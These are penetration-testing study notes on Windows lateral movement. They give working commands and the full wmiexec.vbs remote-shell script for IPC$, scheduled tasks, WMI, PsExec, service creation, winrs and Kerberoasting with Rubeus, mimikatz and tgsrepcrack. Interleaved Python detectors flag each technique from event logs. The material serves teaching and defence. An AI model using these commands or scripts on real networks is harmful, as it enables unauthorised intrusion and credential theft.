[Notes] Lateral Movement

Preface

Study notes on lateral movement in internal network penetration testing.

IPC Lateral Movement

List established remote connections

net use

Establish a remote connection

  • Establish a remote connection through the IPC$ shared folder

<ip>: remote IP address
<username>: username
<password>: password

net use \\<ip>\ipc$ <password> /user:<username>

<domain>: domain name

net use \\<ip>\ipc$ <password> /user:<domain>\<username>

Disconnect established remote connections

Disconnect the established connection to a specified IP address

net use \\<ip> /del

Disconnect all established remote connections

net use * /del

Send a file over the remote connection

c$: copies the file to the root folder of the C: drive

copy <file> \\<ip>\c$

List remote files

dir \\<ip>\c$

Get the current time

net time

Create a scheduled task remotely

Windows version < Windows Server 2012

Create a scheduled task with at

\\<ip>: specifies the target IP address
00:00: time at which the task runs, hour:minute
c:\<file>: executable the task runs

at \\<ip> 00:00 c:\<file>

Windows version >= Windows Server 2012

Create a scheduled task with schtasks

/S <ip>: specifies the target IP address
/U <username>: specifies the username
/P <password>: specifies the password
/TN <task_name>: specifies the task name
/TR c:\<file>: executable the task runs
/SC: defines the trigger

/SC ONCE /ST 00:00: run at the specified time
/SC ONSTART: run every time the system starts
/SC ONLOGON: run every time any user logs on
/SC MINUTE, /SC HOURLY, /SC DAILY, /SC WEEKLY, /SC MONTHLY: run repeatedly at the given interval

/F: when the trigger fires, execute directly without interactive prompting
/RU "SYSTEM": run with SYSTEM privileges

schtasks /CREATE /S <ip> /U <username> /P <password> /TN <task_name> /TR c:\<file> /F
Run the scheduled task immediately
schtasks /RUN /S <ip> /U <username> /P <password> /TN <task_name> /F
Delete the scheduled task
schtasks /DELETE /S <ip> /U <username> /P <password> /TN <task_name> /F
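Every step in the IPC and scheduled-task sections above leaves a record on the target: mapping IPC$ or C$ produces Security event 5140 (network share accessed, with the client's address), and at/schtasks produce event 4698 (scheduled task created) under the same logon session. The following detector, which is an added example and not code from the original notes, correlates the two by SubjectLogonId. The log records are constructed in a simplified JSON-lines form; the field names follow the Security log schema, the values, hosts and users are made up, and the 10-minute window is an assumption.

```python
"""Flag admin-share access followed by remote scheduled-task creation.

Added example, not from the original notes. Input is a constructed JSON-lines
export of Security events 5140 (network share accessed) and 4698 (scheduled
task created); field names follow the event schema, values are made up.
"""
import json
import re
from datetime import datetime, timedelta

# Shares touched by `net use \\<ip>\ipc$`, `copy <file> \\<ip>\c$`, `dir \\<ip>\c$`.
ADMIN_SHARES = re.compile(r"\\(IPC|C|ADMIN)\$$", re.IGNORECASE)
# The legacy `at` service names the tasks it creates At1, At2, ...
AT_TASK = re.compile(r"^\\?At\d+$", re.IGNORECASE)
WINDOW = timedelta(minutes=10)  # assumption: share access and task creation this close are one action

# Constructed sample: 10.0.0.5 maps IPC$ and C$ on SRV01 and creates a task in the
# same logon session; 10.0.0.7 only reads an ordinary share; a later At1 task
# appears with no share activity at all.
SAMPLE_LOG = r"""
{"TimeCreated": "2024-01-10T09:00:01", "EventID": 5140, "Computer": "SRV01", "SubjectLogonId": "0x3e7a1", "SubjectUserName": "jdoe", "IpAddress": "10.0.0.5", "ShareName": "\\\\*\\IPC$"}
{"TimeCreated": "2024-01-10T09:00:03", "EventID": 5140, "Computer": "SRV01", "SubjectLogonId": "0x3e7a1", "SubjectUserName": "jdoe", "IpAddress": "10.0.0.5", "ShareName": "\\\\*\\C$"}
{"TimeCreated": "2024-01-10T09:00:20", "EventID": 4698, "Computer": "SRV01", "SubjectLogonId": "0x3e7a1", "SubjectUserName": "jdoe", "TaskName": "\\updater"}
{"TimeCreated": "2024-01-10T09:05:00", "EventID": 5140, "Computer": "SRV01", "SubjectLogonId": "0x41c02", "SubjectUserName": "asmith", "IpAddress": "10.0.0.7", "ShareName": "\\\\*\\Finance"}
{"TimeCreated": "2024-01-10T11:30:00", "EventID": 4698, "Computer": "SRV01", "SubjectLogonId": "0x52d11", "SubjectUserName": "backup", "TaskName": "\\At1"}
"""


def parse_events(text):
    """Parse a JSON-lines export into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_remote_task_creation(events, window=WINDOW):
    """Return one alert per 4698 that follows admin-share access in the same
    logon session within `window`, or whose name matches the `at` pattern."""
    share_hits = {}  # SubjectLogonId -> (timestamp, client IP, share name)
    alerts = []
    for e in sorted(events, key=lambda ev: ev["TimeCreated"]):
        ts = datetime.fromisoformat(e["TimeCreated"])
        if e["EventID"] == 5140 and ADMIN_SHARES.search(e["ShareName"]):
            share_hits[e["SubjectLogonId"]] = (ts, e["IpAddress"], e["ShareName"])
        elif e["EventID"] == 4698:
            hit = share_hits.get(e["SubjectLogonId"])
            reason = None
            if hit is not None and ts - hit[0] <= window:
                reason = f"task created by the session that mapped {hit[2]} from {hit[1]}"
            elif AT_TASK.match(e["TaskName"]):
                reason = "task name matches the legacy 'at' service naming"
            if reason:
                alerts.append({
                    "host": e["Computer"],
                    "user": e["SubjectUserName"],
                    "task": e["TaskName"],
                    "source_ip": hit[1] if hit is not None else None,
                    "reason": reason,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_task_creation(parse_events(SAMPLE_LOG)):
        print(alert)
```

Correlating on the logon ID rather than on the user name matters: the same account may have an interactive session on the server, but a task created from the network logon that just mapped C$ is the pattern the notes describe. Event 5140 requires the "Audit File Share" subcategory and 4698 requires "Audit Other Object Access Events" to be enabled on the target.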

WMI Lateral Movement

wmic

  • Windows native tool
  • No output echo, not interactive
wmic /node:<ip> /user:<username> /password:<password> process call create "cmd.exe /c <shell>"

wmiexec.vbs

  • Remote command execution via wmiexec.vbs
  • The vbs script must be created first
  • Has output echo, interactive
wmiexec.vbs
On Error Resume Next
'################################ Temp Result File , Change it to where you like
Const Path = "C:\"
Const FileName = "wmi.dll"
Const timeOut = 1200
'################################
file = Path & "\" & FileName
file = Replace(file,"\\","\")
Set fso = CreateObject("Scripting.FileSystemObject")
FilePath = fso.GetParentFolderName(file) 'for wmi create share
'WScript.Echo FilePath

WAITTIME = timeOut 'ms time to execute command ,read result file after 1200ms

Set objArgs = WScript.Arguments
intArgCount = objArgs.Count
If intArgCount < 2 Or intArgCount > 5 Then
WScript.Echo
WScript.Echo " $$\ $$\ $$\ $$\ $$$$$$\ $$$$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$\ "
WScript.Echo " $$ | $\ $$ |$$$\ $$$ |\_$$ _|$$ _____|$$ | $$ |$$ _____|$$ __$$\ "
WScript.Echo " $$ |$$$\ $$ |$$$$\ $$$$ | $$ | $$ | \$$\ $$ |$$ | $$ / \__|"
WScript.Echo " $$ $$ $$\$$ |$$\$$\$$ $$ | $$ | $$$$$\ \$$$$ / $$$$$\ $$ | "
WScript.Echo " $$$$ _$$$$ |$$ \$$$ $$ | $$ | $$ __| $$ $$< $$ __| $$ | "
WScript.Echo " $$$ / \$$$ |$$ |\$ /$$ | $$ | $$ | $$ /\$$\ $$ | $$ | $$\ "
WScript.Echo " $$ / \$$ |$$ | \_/ $$ |$$$$$$\ $$$$$$$$\ $$ / $$ |$$$$$$$$\ \$$$$$$ |"
WScript.Echo " \__/ \__|\__| \__|\______|\________|\__| \__|\________| \______/ "
WScript.Echo " v1.1dev By. Twi1ight "
WScript.Echo " Usage:" & _
vbTab & "wmiexec.vbs /shell host" & _
vbNewLine & vbTab & "wmiexec.vbs /shell host user pass" & _
vbNewLine & vbTab & "wmiexec.vbs /cmd host command" & _
vbNewLine & vbTab & "wmiexec.vbs /cmd host user pass command" & vbNewLine & _
vbNewLine & vbTab & " /shell" & vbTab & "half-interactive shell mode" & _
vbNewLine & vbTab & " /cmd" & vbTab & vbTab & "single command mode" & _
vbNewLine & vbTab & " host" & vbTab & vbTab & "hostname or IP address" & _
vbNewLine & vbTab & " command" & vbTab & "the command to execute on remote host" & _
vbNewLine & vbNewLine & vbTab & " -waitTIME" & vbTab & _
"[both mode] ,delay TIME to read result,"& vbNewLine & vbTab & _
vbTab & vbTab &"eg. 'systeminfo -wait5000' 'ping google.com -wait2000'" & _
vbNewLine & vbTab & " -persist" & vbTab & _
"[both mode] ,running command background and persistent" & vbNewLine & vbTab & _
vbTab & vbTab &"such as nc.exe or Trojan"
WScript.Quit()
End If

If LCase(objArgs.Item(0)) <> "/cmd" And LCase(objArgs.Item(0)) <> "/shell" Then
WScript.Echo "WMIEXEC ERROR: Wrong Mode Specified!"
WScript.Quit
End If
boolShellMode = True
If LCase(objArgs.Item(0)) = "/cmd" Then boolShellMode = False
If boolShellMode = False Then command = objArgs.Item(intArgCount - 1)

host = objArgs.Item(1)
If intArgCount > 3 Then
user = objArgs.Item(2)
pass = objArgs.Item(3)
Set objShell = CreateObject("WScript.Shell")
strNetUse = "cmd.exe /c net use \\" & host & " """ & pass & """ " & "/user:" & user
'WScript.Echo strNetUse
objShell.Run strNetUse,0
End If
'Output Status
WScript.Echo "WMIEXEC : Target -> " & host
WScript.Echo "WMIEXEC : Connecting..."

Set objLocator = CreateObject("wbemscripting.swbemlocator")
If intArgCount >2 Then
set objWMIService = objLocator.connectserver(host,"root/cimv2",user,pass)
Else
Set objWMIService = objLocator.ConnectServer(host,"root/cimv2")
End If
If Err.Number <> 0 Then
WScript.Echo "WMIEXEC ERROR: " & Err.Description
WScript.Quit
End If
WScript.Echo "WMIEXEC : Login -> OK"
WScript.Echo "WMIEXEC : Result File -> " & file

boolPersist = False
'Create Share
CreateShare()
CurrentFolder = Null
'-----single Command mode------
If boolShellMode = False Then
WAITTIME = 5000
WScript.Echo vbNewLine & vbTab & host & " >> " & command
boolGetFolder = False
strResult = PhraseCmd( command )
'WScript.Echo strResult
If strResult = "persist" Then
boolPersist = True
Exec command,"nul"
Else
Exec command, file
ReadResult()
End If
If intArgCount > 3 Then
Set objShell = CreateObject("WScript.Shell")
strNetUse = "cmd.exe /c net use \\" & host & " /del"
objShell.Run strNetUse,0
End If
DeleteShare()
WScript.Quit
End If
'------------------------------

'++++++++shell mode++++++++++++
'get current working directory
boolGetFolder = True
CurrentFolder = Exec("cd", file)

'WScript.Echo CurrentFolder
Do While True
boolPersist = False
WAITTIME = timeOut
wscript.stdout.write(CurrentFolder & ">")
command = wscript.stdin.ReadLine
'press 'Enter' directorly
Do While command = ""
wscript.stdout.write(CurrentFolder & ">")
command = wscript.stdin.ReadLine
Loop
If LCase(Trim(command)) = "exit" Then Exit Do
'If Not IsEmpty(command) Then
'process 'cd' command-------->>>>
strResult = PhraseCmd( command )
If strResult = "cd" Then
command = command & " & cd "
boolGetFolder = True
DestFolder = Exec(command, file)
If CurrentFolder = DestFolder Then
WScript.Echo "The system cannot find the path specified."
Else
CurrentFolder = DestFolder
End If
ElseIf strResult = "persist" Then
boolPersist = True
'WScript.Echo "persist"
Exec command,"nul"
'##########################################toDo
'-----------<<<<
Else
On Error Resume Next
err.clear
Exec command, file
ReadResult()
If err.number <> 0 Then wscript.echo( "WMIEXEC ERROR: " & Err.Number & " " & err.description)
Err.Clear
On Error Goto 0
End If
loop

strDelFile = "del " & file & " /F"
Exec strDelFile,"nul"
If intArgCount > 3 Then
Set objShell = CreateObject("WScript.Shell")
strNetUse = "cmd.exe /c net use \\" & host & " /del"
objShell.Run strNetUse,0
End If
DeleteShare()

'#####################################
Function PhraseCmd(cmd)
PhraseCmd = False ' not 'cd'
arrCommand = Split(cmd)
strExe = arrCommand(0)
If LCase(Trim(strExe)) = "cd" Or LCase(Trim(strExe)) = "cd.exe" Then PhraseCmd = "cd" ' is 'cd'
Set regEx = New RegExp
regEx.Pattern = "^[a-z]:$"
regEx.IgnoreCase = True
Set Matches = regEx.Execute(cmd)
If Matches.Count <> 0 Then PhraseCmd = "cd" ' is 'd:'
'phrase time command
regEx.Pattern = "(.*?)-wait(\d+)"
regEx.IgnoreCase = True
Set Matches = regEx.Execute(cmd)
If Matches.Count <> 0 Then
Set objMatch = Matches(0)
command = objMatch.SubMatches(0)
'WScript.Echo "Command :" & command
WAITTIME = CInt(objMatch.SubMatches(1))
WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine
End If
'phrase persist command
regEx.Pattern = "(.*?)-persist"
regEx.IgnoreCase = True
Set Matches = regEx.Execute(cmd)
If Matches.Count <> 0 Then
Set objMatch = Matches(0)
command = objMatch.SubMatches(0)
PhraseCmd = "persist" ' is quiet
End If
End Function

Function CreateShare()
'create share
Set objNewShare = objWMIService.Get("Win32_Share")
intReturn = objNewShare.Create _
(FilePath, "WMI_SHARE", 0, 25, "")
If intReturn <> 0 Then
WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
Select Case intReturn
Case 2
WScript.Echo "WMIEXEC ERROR: Access Denied!"
Case 9
WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
Case 22
WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
Case 24
WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
End Select
If intReturn <> 22 Then WScript.Quit
Else
WScript.Echo "WMIEXEC : Share created sucess."
WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
WScript.Echo "WMIEXEC : Share Path -> " & FilePath
End If
End Function

Function DeleteShare()
Set colShares = objWMIService.ExecQuery _
("Select * from Win32_Share Where Name = 'WMI_SHARE'")
For Each objShare In colShares
intReturn = objShare.Delete
Next
If intReturn <> 0 Then
WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _
vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
Select Case intReturn
Case 2
WScript.Echo "WMIEXEC ERROR: Access Denied!"
Case 25
WScript.Echo "WMIEXEC ERROR: Share Not Exists!"
End Select
Else
WScript.Echo "WMIEXEC : Share deleted sucess."
End If
End Function

Function Exec(cmd, file)
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 12

Set objProcess=objWMIService.get("Win32_Process")
strExec = "cmd.exe /c " & cmd & " > " & file & " 2>&1" '2>&1 err
If boolPersist Then
strExec = cmd
intPath = InStr(cmd,"\")
If intPath = 0 Then strExec = CurrentFolder & "\" & strExec
End If
'WScript.Echo strExec
intReturn = objProcess.Create _
(strExec, CurrentFolder, objConfig, intProcessID) 'Add CurrentFolder (strExec, Null, objConfig, intProcessID)
If intReturn <> 0 Then
WScript.Echo "WMIEXEC ERROR: Process could not be created." & _
vbNewLine & "WMIEXEC ERROR: Command -> " & cmd & _
vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
Select Case intReturn
Case 2
WScript.Echo "WMIEXEC ERROR: Access Denied!"
Case 3
WScript.Echo "WMIEXEC ERROR: Insufficient Privilege!"
Case 9
WScript.Echo "WMIEXEC ERROR: Path Not Found!"
End Select
Else
' WScript.Echo "Process created." & _
' vbNewLine & "Command: " & cmd & _
' vbNewLine & "Process ID: " & intProcessID
If boolPersist Then WScript.Echo "WMIEXEC : Process created. PID: "& intProcessID
If boolGetFolder = True Then
boolGetFolder = False
Exec = GetCurrentFolder()
Exit Function
End If
'ReadResult()
End If
End Function

Function ReadResult()
WScript.Sleep(WAITTIME)
UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & FileName
Set fso = CreateObject("Scripting.FileSystemObject")
Set objFile = fso.OpenTextFile(UNCFilePath, 1)
If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
objFile.Close
WScript.Echo strContents
'fso.DeleteFile(UNCFilePath) win2008 fso has no privilege to delete file on share folder
strDelFile = "del " & file & " /F"
Exec strDelFile,"nul"
End Function

Function GetCurrentFolder()
WScript.Sleep(WAITTIME)
UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & FileName
Set fso = CreateObject("Scripting.FileSystemObject")
Set objFile = fso.OpenTextFile(UNCFilePath, 1)
GetCurrentFolder = objFile.ReadLine
objFile.Close
strDelFile = "del " & file & " /F"
Exec strDelFile,"nul"
End Function
cscript //nologo wmiexec.vbs /shell <ip> <username> <password>

SMB Lateral Movement

Services

  • Windows built-in tool
  • No output echo, not interactive

Create a service

Plaintext-password connection
services ./<username>:<password>@<ip> create -name shell -display shellexec -path C:\Windows\System32\shell.exe
Hash connection
services -hashes :xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ./<username>@<ip> create -name shell -display shellexec -path C:\Windows\System32\shell.exe

Start the service

Plaintext-password connection
services ./<username>:<password>@<ip> start -name shell
Hash connection
services -hashes :xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ./<username>@<ip> start -name shell

PsExec

  • Official Microsoft tool
  • Has output echo, interactive

Download dependencies

certutil -urlcache -split -f https://download.sysinternals.com/files/PSTools.zip
"C:\Program Files\7-Zip\7z.exe" x PSTools.zip -oPSTools
cd PSTools

Lateral movement

.\PsExec64.exe \\<ip> -u <username> -p <password> -s cmd

RDP Lateral Movement

  • Both the connecting side and the connected side must have the WinRM service (Windows Remote Management) enabled; it listens on port 5985
    • Enabled by default on versions above Windows 7
    • Disabled by default on Windows 7 and below

Lateral movement

winrs -r:<ip> -u:<username> -p:<password> <cmd>
winrs -r:<ip> -u:<domain>\<username> -p:<password> <cmd>
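The WMI, SMB and WinRM channels above differ on the wire but share one trait on the target: the shell is started by the host-side component of the channel (WmiPrvSE.exe for wmic and wmiexec.vbs, PSEXESVC.exe for PsExec, winrshost.exe for winrs, services.exe for a service created over SMB), never by a user's explorer.exe. The wmiexec.vbs script in the notes adds a second tell: it runs `cmd.exe /c <command> > <file> 2>&1` and reads the file back over a share. The process-lineage detector below is an added example, not code from the notes or from any of those tools; it runs over constructed Sysmon process-creation (Event ID 1) records with made-up hosts and users, and the parent-process list is an assumption for the example rather than a complete catalogue.

```python
"""Flag shells spawned by remote-execution service processes.

Added example, not from the original notes. Input is a constructed JSON-lines
export of Sysmon Event ID 1 (process creation); field names follow the Sysmon
schema (UtcTime, Computer, User, Image, ParentImage, CommandLine), values are
made up.
"""
import json
import re

# Host-side parents of the channels in the notes (assumed list for this example).
REMOTE_EXEC_PARENTS = {
    "wmiprvse.exe": "WMI (wmic process call create / wmiexec.vbs)",
    "psexesvc.exe": "PsExec service",
    "winrshost.exe": "WinRM (winrs)",
    "services.exe": "service started by the Service Control Manager",
}
SHELLS = {"cmd.exe", "powershell.exe"}
# wmiexec.vbs pattern: `cmd.exe /c <cmd> > <file> 2>&1`, output collected later via a share.
REDIRECT = re.compile(r"cmd\.exe\s+/[cq]\s+.*>\s*\S+\s+2>&1", re.IGNORECASE)

# Constructed sample: three remote shells on SRV01, one ordinary interactive cmd
# on a workstation, and a normal svchost start by the SCM.
SAMPLE_LOG = r"""
{"UtcTime": "2024-01-10 09:01:00", "Computer": "SRV01", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "cmd.exe /c whoami > C:\\wmi.dll 2>&1"}
{"UtcTime": "2024-01-10 09:02:00", "Computer": "SRV01", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\PSEXESVC.exe", "CommandLine": "cmd"}
{"UtcTime": "2024-01-10 09:03:00", "Computer": "SRV01", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\winrshost.exe", "CommandLine": "cmd.exe /c hostname"}
{"UtcTime": "2024-01-10 09:04:00", "Computer": "WS07", "User": "CORP\\asmith", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe"}
{"UtcTime": "2024-01-10 09:05:00", "Computer": "SRV01", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\svchost.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "svchost.exe -k netsvcs"}
"""


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_remote_shells(events):
    """Return one alert per process-creation record that looks like a remotely
    started shell, with every reason that fired."""
    alerts = []
    for e in events:
        parent = basename(e["ParentImage"])
        child = basename(e["Image"])
        reasons = []
        if parent in REMOTE_EXEC_PARENTS and child in SHELLS:
            reasons.append(f"{child} spawned by {REMOTE_EXEC_PARENTS[parent]}")
        if REDIRECT.search(e["CommandLine"]):
            reasons.append("output redirected to a file for later retrieval (wmiexec pattern)")
        if reasons:
            alerts.append({
                "host": e["Computer"],
                "user": e["User"],
                "parent": parent,
                "command": e["CommandLine"],
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_shells(parse_events(SAMPLE_LOG)):
        print(alert)
```

The lineage rule is deliberately narrow (shell children only) so that services.exe starting svchost.exe stays quiet; a service whose binary is an arbitrary executable, as in the services example above, is better caught by System event 7045 (a service was installed), which records the service name and image path at creation time.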

Kerberos Lateral Movement

  • Extract credentials from Windows service communication
  • Brute-force the passwords of credentials encrypted with RC4

Finding targets

  • Credentials encrypted with RC4

Finding targets with PowerShell

  • Manually look, one at a time, for Windows services whose credentials use RC4 encryption
List the Windows services enabled on hosts in the domain
setspn -T <domain> -q */*
Filter
setspn -T <domain> -q */* | findstr "<str>"
Establish a connection

MSSQLSvc/Srv-DB-<domain>:1433: the full service name obtained in the previous step

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-<domain>:1433"
View credentials
klist

Using Rubeus

  • Directly obtain the Windows services whose credentials use RC4 encryption
Download the source
certutil -urlcache -split -f https://github.com/GhostPack/Rubeus/archive/refs/tags/1.6.4.zip
"C:\Program Files\7-Zip\7z.exe" x 1.6.4.zip
Compile the source with Visual Studio
  • Open the Rubeus-1.6.4/Rubeus.sln file in Visual Studio and build the project

  • This produces the file Rubeus-1.6.4/Rubeus/bin/Debug/Rubeus.exe
Identify targets whose credential encryption protocol is RC4
.\Rubeus.exe asktgt kerberoast
View credentials
klist

Export credentials with mimikatz

mimikatz kerberos::list /export

Brute-force the credentials

Download dependencies

git clone https://github.com/nidem/kerberoast.git
cd kerberoast

Brute-force

<file>.txt: dictionary file
<file_ticket>: credential file exported in the previous step

python3 tgsrepcrack.py <file>.txt <file_ticket>
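Both target-finding methods above end the same way on the domain controller: each service ticket requested, whether one at a time with KerberosRequestorSecurityToken or in bulk with Rubeus, produces a Security event 4769 (Kerberos service ticket requested) whose TicketEncryptionType is 0x17 for an RC4-HMAC ticket. The detector below is an added example, not code from the notes or from any of the tools they mention. It works on constructed 4769 records with made-up accounts and addresses; the 5-minute window and the threshold of three distinct services are assumptions chosen for the example.

```python
"""Spot Kerberoasting-style bursts of RC4 service-ticket requests.

Added example, not from the original notes. Input is a constructed JSON-lines
export of Security event 4769; field names follow the event schema
(TargetUserName = requesting account, ServiceName = account owning the SPN,
TicketEncryptionType, IpAddress, Status), values are made up.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                   # etype 23; AES tickets show 0x11 / 0x12
BURST_WINDOW = timedelta(minutes=5)  # assumption for this example
BURST_SERVICES = 3                   # assumption: distinct RC4 tickets per requester

# Constructed sample: jdoe pulls RC4 tickets for four service accounts within
# two seconds; asmith gets AES tickets; a machine account and krbtgt are noise.
SAMPLE_LOG = r"""
{"TimeCreated": "2024-01-10T10:00:00", "EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"}
{"TimeCreated": "2024-01-10T10:00:01", "EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"}
{"TimeCreated": "2024-01-10T10:00:01", "EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"}
{"TimeCreated": "2024-01-10T10:00:02", "EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_report", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"}
{"TimeCreated": "2024-01-10T10:20:00", "EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_web", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.7", "Status": "0x0"}
{"TimeCreated": "2024-01-10T10:21:00", "EventID": 4769, "TargetUserName": "WS07$@CORP.LOCAL", "ServiceName": "SRV01$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.9", "Status": "0x0"}
{"TimeCreated": "2024-01-10T10:22:00", "EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.7", "Status": "0x0"}
"""


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def rc4_service_requests(events):
    """Successful 4769s for RC4 tickets of user-owned SPNs. Machine accounts
    (name ends in $) and krbtgt are skipped: they are not what is cracked."""
    out = []
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if e["TicketEncryptionType"].lower() == RC4_HMAC:
            out.append(e)
    return out


def kerberoast_bursts(events, window=BURST_WINDOW, threshold=BURST_SERVICES):
    """Report requesters that obtained RC4 tickets for >= threshold distinct
    services within `window`, with the earliest request as the start."""
    by_requester = defaultdict(list)
    for e in rc4_service_requests(events):
        by_requester[e["TargetUserName"]].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"], e["IpAddress"]))
    findings = []
    for requester, reqs in by_requester.items():
        reqs.sort()
        for i, (t0, _, ip) in enumerate(reqs):  # sliding window from each request
            services = {s for t, s, _ in reqs[i:] if t - t0 <= window}
            if len(services) >= threshold:
                findings.append({"requester": requester, "source_ip": ip,
                                 "services": sorted(services), "start": t0.isoformat()})
                break
    return findings


if __name__ == "__main__":
    for f in kerberoast_bursts(parse_events(SAMPLE_LOG)):
        print(f)
```

The single PowerShell request in the notes does not reach the burst threshold, which is why rc4_service_requests is exposed separately: in a domain where service accounts have AES enabled through msDS-SupportedEncryptionTypes, any RC4 service ticket for a user-owned SPN is itself unusual. On the mitigation side, the attack depends on the ticket being encrypted with a key derived from a guessable password, so AES-only service accounts with long random passwords, or group Managed Service Accounts, remove the crackable material rather than only the signal.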

Done

References

freebuf: Anonymous_124
西瓜视频 (Xigua Video): 爱比较
CSDN: jataflf